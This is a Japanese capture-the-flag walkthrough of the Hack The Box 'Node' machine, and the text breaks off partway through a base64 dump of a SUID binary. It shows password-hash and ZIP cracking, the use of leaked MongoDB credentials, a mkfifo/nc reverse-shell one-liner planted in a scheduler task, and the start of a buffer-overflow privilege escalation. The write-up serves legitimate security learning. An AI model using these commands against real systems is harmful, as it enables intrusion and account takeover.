概要
- 本記事では、Hack The BoxのNodeというBoxを攻略する手順を、解説します。
- こちらも ハッキングAPI―Web APIを攻撃から守るためのテスト技法で取り上げられていて興味を持ちました。
- 難易度
Mediumなので自力で解く事は難しく、0xdf氏のwriteupと公式writeupを大変参考にさせていただきました。
1. ポートスキャン
まずはnmapでターゲットのポートを調査します。
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
| hadoop-datanode-info:
|_ Logs: /login
主な開放ポート:
- 22/tcp (SSH)
- 3000/tcp (HTTP - Apache Hadoop)
2. フィンガープリンティング
ブラウザでポート3000にアクセスします。
開発者ツール
Networkタブでバックグラウンドで読み込んでいるJSファイルを確認すると、home.jsからAPIの存在がわかります。
var controllers = angular.module('controllers');
controllers.controller('HomeCtrl', function ($scope, $http) {
$http.get('/api/users/latest').then(function (res) {
$scope.users = res.data;
});
});
API調査
-
/api/users/latest- ホーム画面に表示されていた3名のユーザー情報が取得できます。ここには、本来不要なパスワードハッシュまで含まれており、マスアサインメントの脆弱性が存在します。
-
/api/users- 全ユーザーの情報が取得できます。
-
myP14ceAdm1nAcc0uNTユーザーはis_admin:trueとなっています。
[
{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true},
{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},
{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},
{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}
]
3. 初期侵入 (Initial Foothold)
ハッシュ解析
is_admin:true のユーザー myP14ceAdm1nAcc0uNT のパスワードハッシュを解析します。
dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
hash-identifierで種類を特定すると SHA-256 と判明します。
hashcatで解析
$ hashcat -m 1400 -a 0 ./hash.txt /usr/share/wordlists/rockyou.txt
$ hashcat -m 1400 -a 0 ./hash.txt /usr/share/wordlists/rockyou.txt --show
または、crackstationでも解析済みのパスワードが分かります
バックアップファイル解析
管理者アカウントでログイン後、バックアップファイル myplace.backup をダウンロードします。
私の環境からだとダウンロードが途中で止まってしまいファイルが取得できず、pwnboxを使ってダウンロードしたファイルを攻撃端末に移動しました。もし同じ状況でやり方がわからない方がいればコメントなどでご連絡ください。
myplace.backupをBase64デコードするとパスワード付きのZIPファイルが得られます。
$ base64 -d myplace.backup > decoded.backup
$ mv decoded.backup backup.zip
zip2johnとjohnでZIPのパスワードをクラックします。
# hash抽出
$ zip2john backup.zip 2>/dev/null | tee backup.zip.hash
# パスワード解析
$ john backup.zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
# 結果確認
$ john --show backup.zip.hash
backup.zip:magicword::backup.zip:var/www/myplace/node_modules/qs/.eslintignore, var/www/myplace/node_modules/express/node_modules/qs/.eslintignore, var/www/myplace/node_modules/string_decoder/.npmignore, var/www/myplace/node_modules/isarray/.npmignore, var/www/myplace/node_modules/ipaddr.js/.npmignore, var/www/myplace/node_modules/cookie-signature/.npmignore, var/www/myplace/node_modules/isarray/.travis.yml, var/www/myplace/node_modules/debug/node.js:backup.zip
パスワードmagicwordが判明するので、パスワードを使って解凍します。
$ unzip backup.zip
解凍したフォルダ内のapp.jsにDB接続情報が記載されています。
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
判明したユーザー mark のパスワード を使ってSSH接続し、user.txt を取得します。
4. ラテラルムーブメント (tomユーザーへ)
ps auxww | grep tom を実行すると、tomユーザーで2つのnodeプロセスが動いていることがわかります。そのうちの一つ、/var/scheduler/app.js を確認します。
このスクリプトは、schedulerデータベースのtasksコレクションにあるコマンドを30秒ごとに実行するものです。
この仕組みを利用して、リバースシェルの取得を目指します。
まず、攻撃端末の4444ポートで待ち受けます。
$ nc -lnvp 4444
app.jsに記載してあった認証情報でMongoDBに接続し、tasksコレクションにリバースシェルを実行するコマンドを挿入します。
mark@node:~$ mongo -p -u mark scheduler
> db.tasks.insert({"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f"})
シェルの安定化
$ python -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
tom@node:/$ ^Z
[1]+ Stopped nc -lnvp 4444
$ stty raw -echo; fg
nc -lnvp 4444
export TERM=xterm-256color
tom@node:/$ export SHELL=bash
5. 権限昇格 (rootへ)
idで情報を確認
tom@node:/$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
tomユーザはadminグループに所属しています。
adminグループが所有するファイルを検索すると、 SUIDビットが設定された/usr/local/bin/backupが見つかります。
tom@node:/$ find / -group admin -ls 2>/dev/null
56747 20 -rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
/usr/local/bin/backupの調査
/usr/local/bin/backupは実行可能なバイナリ形式のファイルです。
file /usr/local/bin/backup
/usr/local/bin/backup: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=343cf2d93fb2905848a42007439494a2b4984369, not stripped
/usr/local/bin/はPATHに登録されているのでbackupだけで実行できます。
実行しても何も表示されません。
tom@node:/$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
tom@node:/$ backup
引数を3つ付けて実行すると画面が表示され、最後の行にmagic wordを求めるメッセージが表われます。
tom@node:/$ backup a b c
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | Secure Backup v1.0 | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
[!] Ah-ah-ah! You didn't say the magic word!
ltraceを使って動作を追跡してみます。
tom@node:/$ ltrace backup a b c
__libc_start_main(0x80489fd, 4, 0xffd75174, 0x80492c0 <unfinished ...>
geteuid() = 1000
setuid(1000) = 0
strcmp("a", "-q") = 1
puts("\n\n\n ________________"...
____________________________________________________
) = 69
puts(" / "... / \
) = 67
puts(" | ________________"... | _____________________________________________ |
) = 68
puts(" | | "... | | | |
) = 68
puts(" | | "... | | | |
) = 68
puts(" | | "... | | | |
) = 68
puts(" | | "... | | | |
) = 68
puts(" | | "... | | | |
) = 68
puts(" | | "... | | | |
) = 68
puts(" | | Sec"... | | Secure Backup v1.0 | |
) = 68
puts(" | | "... | | | |
) = 68
puts(" | | "... | | | |
) = 68
puts(" | | "... | | | |
) = 68
puts(" | | "... | | | |
) = 68
puts(" | | "... | | | |
) = 68
puts(" | | "... | | | |
) = 68
puts(" | |________________"... | |_____________________________________________| |
) = 68
puts(" | "... | |
) = 68
puts(" \\___________________"... \_____________________________________________________/
) = 68
puts(" \\____________"... \_______________________________________/
) = 61
puts(" ________________"... _______________________________________________
) = 64
puts(" _-' .-.-.-.-.-.-"... _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
) = 67
puts(" _-'.-.-. .---.-.-.-.-."... _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
) = 70
puts(" _-'.-.-.-. .---.-.-.-.-.-"... _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
) = 73
puts(" _-'.-.-.-.-. .-----.-.-.-.-."... _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
) = 76
puts(" _-'.-.-.-.-.-. .---.-. .-------"... _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
) = 79
puts(":-------------------------------"...:-----------------------------------------------------------------------------:
) = 80
puts("`---._.-------------------------"...`---._.-----------------------------------------------------------------._.---'
) = 82
strncpy(0xffd75038, "b", 100) = 0xffd75038
strcpy(0xffd75021, "/") = 0xffd75021
strcpy(0xffd7502d, "/") = 0xffd7502d
strcpy(0xffd74fb7, "/e") = 0xffd74fb7
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x8602410
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x8602410) = 0xffd74bcf
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64
strcmp("b", "a01a6aa5aaf1d7729f35c8278daae30f"...) = 1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x8602410) = 0xffd74bcf
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64
strcmp("b", "45fac180e9eee72f4fd2d9386ea7033e"...) = 1
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x8602410) = 0xffd74bcf
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64
strcmp("b", "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("\n", 1000, 0x8602410) = 0xffd74bcf
strcspn("\n", "\n") = 0
strcmp("b", "") = 1
fgets(nil, 1000, 0x8602410) = 0
strcpy(0xffd73c08, "Ah-ah-ah! You didn't say the mag"...) = 0xffd73c08
printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "Ah-ah-ah! You didn't say the mag"... [!] Ah-ah-ah! You didn't say the magic word!
) = 58
exit(1 <no return ...>
+++ exited (status 1) +++
分かったこと
- 第1引数と
-qを比較している - 第2引数と
/etc/myplace/keys内のキーを比較している -
-qをつけると画面の表示がなくなるのでサイレントモードのフラグかと思われる
/etc/myplace/keysの内容
tom@node:/$ cat /etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
第2引数に/etc/myplace/keys記載の
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110を指定するとメッセージが変わりStarting archiving cとのメッセージから第三引数にバックアップ対象のファイルパスを指定すると予測できます。
tom@node:/$ ltrace backup a 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638 c
<SNIP>
[+] Validated access token
[+] Starting archiving c
[!] The target path doesn't exist
/rootをバックアップしてみる
/rootのバックアップを試します。
tom@node:/$ backup a 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 /root
<SNIP>
[+] Validated access token
[+] Finished! Encoded backup is below:
UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
base64エンコードらしき文字列が表示されるので、以前のバックアップ同様デコードしてzipにします。
今回はunzipだと解凍できず7zipを利用します。
パスワードも以前と同じmagicwordで解凍します。
$ echo "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==" > backup_root
$ cat backup_root | base64 -d > decoded.backup_root
$ file decoded.backup_root
decoded.backup_root: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
$ mv decoded.backup_root backup_root.zip
$ 7z x backup_root.zip
<SNIP>
Enter password (will not be echoed):
Everything is Ok
Size: 2584
Compressed: 1141
root.txtファイルの内容は不気味な画になって内容は読み取れなくなっていました。
バックアップ対象に/rootなどのパスは指定できないようで、別の方法を検討する必要があります。
$ cat root.txt
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP" <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ
QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^ ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <c jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ
BOFを利用した権限昇格
backupの調査に戻り、第3引数に長い文字列を与えてみるとセグメンテーションフォールトが発生します。
tom@node:/$ backup a 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 $(python -c 'print("A"*2000)')
<SNIP>
[+] Validated access token
[+] Starting archiving AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
ここからバッファオーバーフローの脆弱性が存在することがわかります。
BOFを利用して権限昇格を狙います。
オフセットの計算
gdb-pedaで解析する為に、backupを自身の端末に移動します。
http経由ではダウンロードできなかったのでバイナリファイルをエンコードしてコピーしました。
tom@node:~$ cat /usr/local/bin/backup | base64
f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAgIcECDQAAACMOwAAAAAAADQAIAAJACgAHwAcAAYAAAA0
AAAANIAECDSABAggAQAAIAEAAAUAAAAEAAAAAwAAAFQBAABUgQQIVIEECBMAAAATAAAABAAAAAEA
AAABAAAAAAAAAACABAgAgAQI/CAAAPwgAAAFAAAAABAAAAEAAAAILwAACL8ECAi/BAhwAQAAdAEA
AAYAAAAAEAAAAgAAABQvAAAUvwQIFL8ECOgAAADoAAAABgAAAAQAAAAEAAAAaAEAAGiBBAhogQQI
RAAAAEQAAAAEAAAABAAAAFDldGRMHwAATJ8ECEyfBAhMAAAATAAAAAQAAAAEAAAAUeV0ZAAAAAAA
AAAAAAAAAAAAAAAAAAAABgAAABAAAABS5XRkCC8AAAi/BAgIvwQI+AAAAPgAAAAEAAAAAQAAAC9s
aWIvbGQtbGludXguc28uMgAABAAAABAAAAABAAAAR05VAAAAAAACAAAABgAAACAAAAAEAAAAFAAA
AAMAAABHTlUANDzy2T+ykFhIpCAHQ5SUorSYQ2kCAAAAGwAAAAEAAAAFAAAAACAAIAAAAAAbAAAA
rUvjwAAAAAAAAAAAAAAAAAAAAABmAAAAAAAAAAAAAAASAAAApwAAAAAAAAAAAAAAEgAAAC4AAAAA
